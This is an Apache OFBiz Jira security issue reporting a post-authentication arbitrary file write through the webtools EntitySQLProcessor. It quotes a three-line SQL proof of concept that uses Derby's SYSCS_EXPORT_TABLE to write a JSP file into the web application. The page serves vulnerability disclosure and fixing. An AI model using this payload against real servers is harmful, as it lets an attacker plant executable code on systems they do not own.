Uploaded image for project: 'OFBiz'
  1. OFBiz
  2. OFBIZ-1525 Issue to group security concerns
  3. OFBIZ-12057

Prevent arbitary file write using webtools/control/EntitySQLProcessor.

    XMLWordPrintableJSON

    Details

    • Sprint:
      Bug Crush Event - 21/2/2015

      Description

      Shuibo Ye <shuiboye@gmail.com> reported a possible arbitary file write using webtools/control/EntitySQLProcessor.

      In the "SQL Command" part, I create a table and insert some strings and export the table to a file one sentence at a time.
      PoC: CREATE TABLE "test" (string VARCHAR(80))
      INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>')
      call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null)

      After executing the three sentences,I successfully write the file and its url is https://localhost:8443/webtools/default.jsp.

      Note: this is a post-auth vuln., So we did not create a CVE

        Attachments

          Activity

            People

            • Assignee:
              jleroux Jacques Le Roux
              Reporter:
              jleroux Jacques Le Roux
            • Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: